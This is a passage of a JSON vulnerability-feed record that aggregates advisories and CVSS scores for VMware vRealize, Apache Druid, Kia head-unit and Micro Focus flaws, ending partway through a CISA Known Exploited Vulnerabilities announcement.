"cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmware:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmware:cloud_foundation:3.7", "cpe:/a:vmware:cloud_foundation:3.8.1", "cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:vrealize_operations_manager:8.2.0", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmware:vrealize_operations_manager:7.5.0", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:vrealize_operations_manager:7.0.0"], "id": "CVE-2021-21983", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21983", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:07:44", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-21975", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-01T17:45:00", "cpe": ["cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:cloud_foundation:3.0.1.1", "cpe:/a:vmware:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", "cpe:/a:vmware:cloud_foundation:3.5.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:cloud_foundation:3.8", "cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmware:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmware:cloud_foundation:3.7", "cpe:/a:vmware:cloud_foundation:3.8.1", "cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:vrealize_operations_manager:8.2.0", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmware:vrealize_operations_manager:7.5.0", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:vrealize_operations_manager:7.0.0"], "id": "CVE-2021-21975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21975", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T15:31:10", "description": "Kia Motors Head Unit with Software version: SOP.003.30.18.0703, SOP.005.7.181019, and SOP.007.1.191209 may allow an attacker to inject unauthorized commands, by executing the micomd executable deamon, to trigger unintended functionalities. In addition, this executable may be used by an attacker to inject commands to generate CAN frames that are sent into the M-CAN bus (Multimedia CAN bus) of the vehicle.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-01T18:15:00", "type": "cve", "title": "CVE-2020-8539", "cwe": ["CWE-276"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8539"], "modified": "2020-12-08T02:37:00", "cpe": ["cpe:/o:kia:head_unit_firmware:sop.005.7.181019", "cpe:/o:kia:head_unit_firmware:sop.007.1.191209", "cpe:/o:kia:head_unit_firmware:sop.003.30.18.0703"], "id": "CVE-2020-8539", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8539", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:kia:head_unit_firmware:sop.005.7.181019:*:*:*:*:*:*:*", "cpe:2.3:o:kia:head_unit_firmware:sop.007.1.191209:*:*:*:*:*:*:*", "cpe:2.3:o:kia:head_unit_firmware:sop.003.30.18.0703:*:*:*:*:*:*:*"]}], "zdi": [{"lastseen": "2022-01-31T21:58:30", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the creation of the shrboadmin user during installation. The product contains a hard-coded password for this account. An attacker can leverage this vulnerability to execute arbitrary code in the context of the shrboadmin user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-23T00:00:00", "type": "zdi", "title": "Micro Focus Operations Bridge Reporter shrboadmin Use of Hard-coded Credentials Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11857"], "modified": "2020-09-23T00:00:00", "id": "ZDI-20-1215", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1215/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:34:08", "description": "A remote code execution vulnerability exists in Apache Druid. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-15T00:00:00", "type": "checkpoint_advisories", "title": "Apache Druid Remote Code Execution (CVE-2021-25646)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2021-02-15T00:00:00", "id": "CPAI-2021-0069", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:33:27", "description": "URL Directory Traversal Over HTTP Traffic.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-21T00:00:00", "type": "checkpoint_advisories", "title": "URL Directory Traversal Over HTTP Traffic (CVE-2021-21983)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983"], "modified": "2021-04-21T00:00:00", "id": "CPAI-2021-0234", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-06-07T16:06:23", "description": "An arbitrary file write vulnerability exists in VMware vRealize Operations Manager API. Successful exploitation of this vulnerability could result in code execution on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-06-07T00:00:00", "type": "checkpoint_advisories", "title": "VMware vRealize Operations Manager API Arbitrary File Write (CVE-2021-21983)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983"], "modified": "2022-06-07T00:00:00", "id": "CPAI-2022-0230", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-02-23T23:31:36", "description": "A sever-side request forgery vulnerability exists in VMware vRealize Operations Manager. Successful exploitation of this vulnerability could possibly lead to an attacker accessing administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-23T00:00:00", "type": "checkpoint_advisories", "title": "VMware vRealize Operations Manager API Server Side Request Forgery (CVE-2021-21975)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-23T00:00:00", "id": "CPAI-2021-1066", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhatcve": [{"lastseen": "2023-03-08T05:23:10", "description": "Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-01T14:02:57", "type": "redhatcve", "title": "CVE-2021-25646", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2023-03-08T04:27:56", "id": "RH:CVE-2021-25646", "href": "https://access.redhat.com/security/cve/cve-2021-25646", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "github": [{"lastseen": "2023-02-01T05:08:05", "description": "Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-16T17:40:47", "type": "github", "title": "Code injection in Apache Druid", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2023-02-01T05:05:13", "id": "GHSA-WRQF-RRRW-W3MG", "href": "https://github.com/advisories/GHSA-wrqf-rrrw-w3mg", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2022-07-26T13:21:50", "description": "Apache Druid is vulnerable to remote code execution. An attacker is able to execute arbitrary JavaScript code that is embedded in certain types of requests. This functionality is however disabled by default. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-07T04:05:58", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2022-07-13T12:57:23", "id": "VERACODE:29287", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29287/summary", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2023-03-12T05:32:20", "description": "Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-16T17:40:47", "type": "osv", "title": "Code injection in Apache Druid", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2023-03-12T05:32:16", "id": "OSV:GHSA-WRQF-RRRW-W3MG", "href": "https://osv.dev/vulnerability/GHSA-wrqf-rrrw-w3mg", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Server Side Request Forgery (SSRF) in vRealize Operations Manager API prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API to perform a SSRF attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "VMware Server Side Request Forgery in vRealize Operations Manager API", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-21975", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisa": [{"lastseen": "2022-01-26T11:28:36", "description": "CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2021-32648 | October CMS Improper Authentication | 2/1/2022 \nCVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022 \nCVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022 \nCVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022 \nCVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022 \nCVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022 \nCVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022 \nCVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022 \nCVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022 \nCVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to 